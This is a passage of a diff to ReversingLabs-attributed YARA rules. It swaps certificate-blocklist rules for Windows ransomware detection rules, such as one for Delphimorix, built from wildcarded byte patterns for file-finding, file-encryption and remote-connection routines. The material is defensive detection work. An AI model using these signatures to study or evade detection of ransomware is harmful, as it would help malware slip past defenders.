+            C3 0F 84 ?? ?? ?? ?? 83 C0 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? 89 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 D2 ?? 89 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
+            90 8D B4 26 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 74 24 ?? C7 44
+            24 ?? ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 FF 95 ?? ?? ?? ?? 8B 8D ??
+            ?? ?? ?? 8B 9D ?? ?? ?? ?? 83 EC ?? 8B 95 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C
+        }
+		$encrypt_files_p3 = {
+            24 ?? 89 0C 24 8B 0A E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 8B
+            9D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 89 44 24 ?? 89 54 24 ?? 89 1C 24
+            FF 95 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 EC ?? 89 9D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
+            ?? 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 89 4C 24 ?? FF 15 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 83 EC ?? 8B 95 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 81 85 ?? ?? ?? ?? ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? 83 95 ?? ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 5C
+            24 ?? 89 54 24 ?? 89 04 24 FF 95 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 83
+            EC ?? 81 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 D9 83 95 ?? ?? ?? ?? ?? 8B 02 89 04 24 E8 ??
+            ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 EC ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D
+            ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 0B 89 85 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 04 24 8B 0B E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 83 EC ?? 89 04 24 8B 85 ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 ?? 8B
+            85 ?? ?? ?? ?? 89 44 24 ?? 8B 0B E8 ?? ?? ?? ?? 8B 0B 83 EC ?? E8 ?? ?? ?? ?? 8B 9D
+            ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 44 24 ?? ?? ??
+            ?? ?? 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 89 1C 24 FF 15 ?? ?? ?? ?? 8B
+        }
+		$encrypt_files_p4 = {
+            85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 89 1C
+            24 89 44 24 ?? 89 54 24 ?? FF 95 ?? ?? ?? ?? 83 EC ?? 83 85 ?? ?? ?? ?? ?? 8B 9D ??
+            ?? ?? ?? 83 95 ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            31 CB 31 D0 89 DA 09 C2 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 8B 95
+            ?? ?? ?? ?? 1B 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 8D ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 74 24 ?? 89 4C 24 ?? 8B 8D ?? ?? ?? ??
+            89 C3 89 44 24 ?? 89 0C 24 FF 95 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 8B 85 ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 8B 95 ?? ?? ?? ?? 89 14 24 8B 08 E8 ?? ??
+            ?? ?? 83 EC ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 7C 24 ?? 8B BD ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89 54 24 ?? 89 3C 24 FF 95 ?? ?? ?? ?? 83 EC ?? 8B
+            95 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 89 5C 24 ?? 8B 1D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
+            ?? 89 74 24 ?? 89 54 24 ?? 89 3C 24 89 9D ?? ?? ?? ?? FF D3 8B 95 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 83 EC ?? B9 ?? ?? ?? ?? C7 85
+        }
+		$encrypt_files_p5 = {
+            89 DF C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F AC D0 ?? C1 EA
+            ?? 01 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 11 95 ?? ?? ?? ?? 31 C0 C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? F3 AB C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45
+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? C7 44 24 ?? ??
+            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 89 54 24 ?? E8 ?? ?? ?? ?? 8B BD ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89 5C 24 ?? C7 04 24 ?? ?? ?? ?? 89 85 ?? ??
+            ?? ?? 89 7C 24 ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 31 C0 F3 AB 8B BD ?? ?? ?? ?? 89 74
+            24 ?? 8D B5 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 74 24 ??
+            89 3C 24 FF 95 ?? ?? ?? ?? 83 EC ?? 89 3C 24 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83
+            EC ?? 8B 18 85 DB 74 ?? 89 D9 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ??
+            ?? 8D 65 ?? 31 C0 5B 5E 5F 5D C2 ?? ?? 8D BD ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? 8B B5
+            ?? ?? ?? ?? 31 D2 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? F3 AB 8B BD ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? 89 F9 C1 F9 ?? 83 E1 ?? 89 C8 01 F0 11 FA 0F AC D0 ?? C1 FA ?? 83
+        }
+		$encrypt_files_p6 = {
+            C0 ?? 83 D2 ?? 0F A4 C2 ?? C1 E0 ?? 89 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 FA 09 F2
+            89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 8D 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 F7 C6 00 ?? 83 C0 ?? 39 C2 75 ?? 89 BD
+            ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C3 8B 85 ?? ?? ?? ?? 89 D9 89 04
+            24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 89 18 A1 ?? ?? ?? ?? 89 44 24 ?? 8D 85
+            ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 89
+            44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 75 ?? 83 C0
+            ?? 83 EC ?? 8B 56 ?? 39 D0 0F 87 ?? ?? ?? ?? 8B 7D ?? 29 C2 8D B5 ?? ?? ?? ?? 8D 9D
+            ?? ?? ?? ?? 8B 0F C6 44 24 ?? ?? 89 9D ?? ?? ?? ?? 8D 0C 41 8D 04 51 89 0C 24 89 F1
+            89 44 24 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 89 34 24 8D 48 ?? E8 ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 39 D8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ??
+            8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 8B 47 ?? 89 34 24 89 44 24 ?? E8 ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 0F C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 90 89 34 24 8B
+            0F 83 C6 ?? E8 ?? ?? ?? ?? 83 EC ?? 39 DE 75 ?? 8B BD ?? ?? ?? ?? 8B B5
+        }
+		$encrypt_files_p7 = {
+            8B 0F E8 ?? ?? ?? ?? 8B 07 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89
+            04 24 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 8B 85 ?? ?? ?? ??
+            8B 9D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B 0F 89 95 ?? ?? ?? ?? 89 95
+            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 04 24 8B 0F E8 ?? ?? ?? ?? 8B 0F 83 EC ?? E8 ??
+            ?? ?? ?? 8B 0F 89 F7 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 95 ?? ??
+            ?? ?? 8B 95 ?? ?? ?? ?? 89 34 24 8D B5 ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? FF 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83
+            EC ?? 89 3C 24 C7 44 24 ?? ?? ?? ?? ?? 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24
+            ?? FF 15 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 83 EC ?? 8B 85 ?? ?? ?? ?? 85 FF 0F 85 ?? ??
+            ?? ?? 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 3D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            0F 87 ?? ?? ?? ?? 3D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 3D
+            ?? ?? ?? ?? 0F 97 C0 0F B6 C0 89 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 65 ?? B8 ?? ?? ??
+            ?? 5B 5E 5F 5D C2 ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 8D 65
+            ?? B8 ?? ?? ?? ?? 5B 5E 5F 5D C2 ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 FF 15
+        }
+		$encrypt_files_p8 = {
+            83 EC ?? 8D 65 ?? 31 C0 5B 5E 5F 5D C2 ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7
+            04 24 ?? ?? ?? ?? 89 C6 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 04 24 C1 F8 ?? 89 F1 89
+            44 24 ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 EC ?? 89 B5 ?? ?? ??
+            ?? 89 85 ?? ?? ?? ?? 89 C3 A1 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85
+            ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 89
+            04 24 89 54 24 ?? 89 74 24 ?? 89 7C 24 ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B BD ??
+            ?? ?? ?? 89 95 ?? ?? ?? ?? 89 54 24 ?? 89 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89
+            7C 24 ?? 89 44 24 ?? 89 34 24 FF 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 89 5C 24
+            ?? C7 44 24 ?? ?? ?? ?? ?? 83 C3 ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 89 44 24 ?? FF
+            95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 EC ?? 39 C3 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 76 ?? 81 BD ?? ??
+            ?? ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? E9 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
+            E9 ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 89 C6 C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 34 24 E8 ??
+            ?? ?? ?? 89 C3 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? EB
+          }
+		$remote_connection_p1 = {
+            55 57 56 53 81 EC ?? ?? ?? ?? 8B 1A 39 18 0F 84 ?? ?? ?? ?? 89 54 24 ?? 89 C6 8D 5C
+            24 ?? F6 05 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 DF 8B 56 ?? 89 54 24
+            ?? 8B 56 ?? 89 54 24 ?? 8B 56 ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89
+            3C 24 E8 ?? ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 01 C7 89 F8 29 D8 BA ?? ?? ?? ?? 89 D5
+            29 C5 F6 05 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 06 89 44 24 ?? 8B 46 ?? 89 44 24 ??
+            C7 44 24 ?? ?? ?? ?? ?? 89 6C 24 ?? 89 3C 24 E8 ?? ?? ?? ?? 89 5C 24 ?? 8B 7C 24 ??
+            8B 07 89 04 24 E8 ?? ?? ?? ?? FF 47 ?? 8B 46 ?? 01 47 ?? 8B 6E ?? 85 ED 0F 84 ?? ??
+            ?? ?? 89 6C 24 ?? 8D 44 24 ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E9 ??
+            ?? ?? ?? 8D B6 ?? ?? ?? ?? 8D BC 27 ?? ?? ?? ?? 85 C0 74 ?? C6 03 ?? A8 ?? 0F 85 ??
+            ?? ?? ?? 8B 7D ?? 8B 75 ?? 89 2C 24 E8 ?? ?? ?? ?? 89 7C 24 ?? 89 74 24 ?? 89 44 24
+            ?? C7 44 24 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 8B 74 24 ?? 29 F0 89 44 24 ?? 8D 04 33 89
+            04 24 E8 ?? ?? ?? ?? 89 DF 8B 17 83 C7 ?? 8D 82 ?? ?? ?? ?? F7 D2 21 D0 25 ?? ?? ??
+            ?? 74 ?? A9 ?? ?? ?? ?? 75 ?? C1 E8 ?? 83 C7 ?? 88 C1 00 C1 83 DF ?? 29 DF 8B 75
+        }
+		$remote_connection_p2 = {
+            89 34 24 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 29 F9 39 C1 0F 8D ?? ?? ?? ?? 8D 04 3B 83 F9
+            ?? 0F 83 ?? ?? ?? ?? 85 C9 74 ?? 8A 16 88 10 F6 C1 ?? 0F 85 ?? ?? ?? ?? BA ?? ?? ??
+            ?? B8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 01 D8 89 04 24 E8 ?? ?? ?? ??
+            89 5C 24 ?? 8B 44 24 ?? 8B 00 89 04 24 E8 ?? ?? ?? ?? 8B 6D ?? 85 ED 74 ?? 8D 44 24
+            ?? 89 44 24 ?? 89 2C 24 E8 ?? ?? ?? ?? 85 C0 75 ?? FF 44 24 ?? 8B 44 24 ?? 83 F8 ??
+            0F 82 ?? ?? ?? ?? C7 44 03 ?? ?? ?? ?? ?? 8D 48 ?? C1 E9 ?? 89 DF B8 ?? ?? ?? ?? F3
+            AB E9 ?? ?? ?? ?? 8D B6 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 5B 5E 5F 5D C3 90 8D 74 26 ??
+            8D 40 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 10 89 54 24 ?? 8B 50 ?? 89 54 24 ?? 8B 40 ?? 89
+            44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89
+            DA 8B 0A 83 C2 ?? 8D 81 ?? ?? ?? ?? F7 D1 21 C8 25 ?? ?? ?? ?? 74 ?? A9
+        }
+		$remote_connection_p3 = {
+            75 ?? C1 E8 ?? 83 C2 ?? 88 C1 00 C1 83 DA ?? 29 DA 8D 3C 13 B8 ?? ?? ?? ?? 29 D0 E9
+            ?? ?? ?? ?? 8D B6 ?? ?? ?? ?? 8D BF ?? ?? ?? ?? B8 ?? ?? ?? ?? 29 F8 89 44 24 ?? 89
+            74 24 ?? 01 DF 89 3C 24 E8 ?? ?? ?? ?? 89 D8 8B 08 83 C0 ?? 8D 91 ?? ?? ?? ?? F7 D1
+            21 CA 81 E2 ?? ?? ?? ?? 74 ?? F7 C2 ?? ?? ?? ?? 75 ?? C1 EA ?? 83 C0 ?? 88 D1 00 D1
+            83 D8 ?? 29 D8 BA ?? ?? ?? ?? 29 C2 E9 ?? ?? ?? ?? 8D 74 26 ?? 8D BC 27 ?? ?? ?? ??
+            8B 16 89 10 8B 54 0E ?? 89 54 08 ?? 8D 78 ?? 83 E7 ?? 29 F8 29 C6 01 C1 C1 E9 ?? F3
+            A5 E9 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 8D BC 27 ?? ?? ?? ?? 89 54 24 ?? 8D 46 ?? 89
+            04 24 E8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 6C 24 ?? 89 3C 24 E8 ??
+            ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 01 C7 89 F8 29 D8 8B 54 24 ?? 29 C2 89 D5 E9 ?? ??
+            ?? ?? 8D B4 26 ?? ?? ?? ?? 8D BC 27 ?? ?? ?? ?? 8B 44 24 ?? 66 C7 44 03 ?? ?? ?? E9
+            ?? ?? ?? ?? 66 8B 54 0E ?? 66 89 54 08 ?? E9 ?? ?? ?? ?? 90 8B 54 24 ?? 8B 44 24 ??
+            E9
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Delta Controls" and pe.signatures [ i ] . serial == "62:9d:12:0d:d8:4f:9c:16:88:d4:da:40:36:6f:ab:7a" and 1306799999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_039E5D0E3297F574Db99E1D9503853D9 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Delphimorix : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Delphimorix ransomware."
 		author = "ReversingLabs"
-		id = "969ffa17-de06-58d5-a74e-c115b49a9a6c"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "1f964601-9819-5597-ba6e-db3a30e3aa5a"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2824-L2840"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2f150f60b7dce583fc68705f0b29a7c8684f1b69020275b2ec1ac6beeaa63952"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Delphimorix.yara#L1-L67"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6d401d488d57b2d75e93a1dfd47ece687a5791d1f0a52768300f4af8a8787212"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Delphimorix"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files = {
+            55 8B EC 83 C4 ?? 53 56 57 33 D2 89 55 ?? 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55
+            68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 6A ?? 8B
+            4D ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 68 ?? ?? ?? ?? 8D 45 ?? B9 ?? ?? ??
+            ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 4D ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8B C3
+            8B 10 FF 12 52 50 B9 ?? ?? ?? ?? 8B D3 8B C6 E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B
+            C6 E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8
+            ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 59 59 5D C3
+        }
+		$find_files_p1 = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ??
+            ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 8B D9 89 55 ?? 89 45 ?? 8B 45 ?? E8 ??
+            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 80 7C 02
+            ?? ?? 75 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 4A 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ??
+            ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 8B D0 83 CA ?? 3B D0 75 ?? 80 FB ?? 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85
+        }
+		$find_files_p2 = {
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CB 8B 55 ?? E8 ?? ?? ?? ?? E9 ??
+            ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B
+            C6 83 C8 ?? 3B C6 75 ?? 80 FB ?? 75 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? FF 75 ?? 68 ?? ?? ??
+            ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 8B CB 8B 55 ?? E8 ?? ?? ?? ?? EB ?? FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ??
+            ?? ?? ?? C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cigam Software Corporativo LTDA" and pe.signatures [ i ] . serial == "03:9e:5d:0e:32:97:f5:74:db:99:e1:d9:50:38:53:d9" and 1378079999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Bc32Bbe5Bbb4F06F490C50651Cd5Da50 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_DMR : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects DMR ransomware."
 		author = "ReversingLabs"
-		id = "eb6ccc6d-2a66-5113-8b78-c32012431123"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "45d8f91f-d2d0-5c6e-a29e-b8c9c29dc296"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2842-L2860"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "104be481b7d4b1cb3c43c72314afc3641983838b5177c34a88d6da0d0e7b89c9"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.DMR.yara#L1-L214"
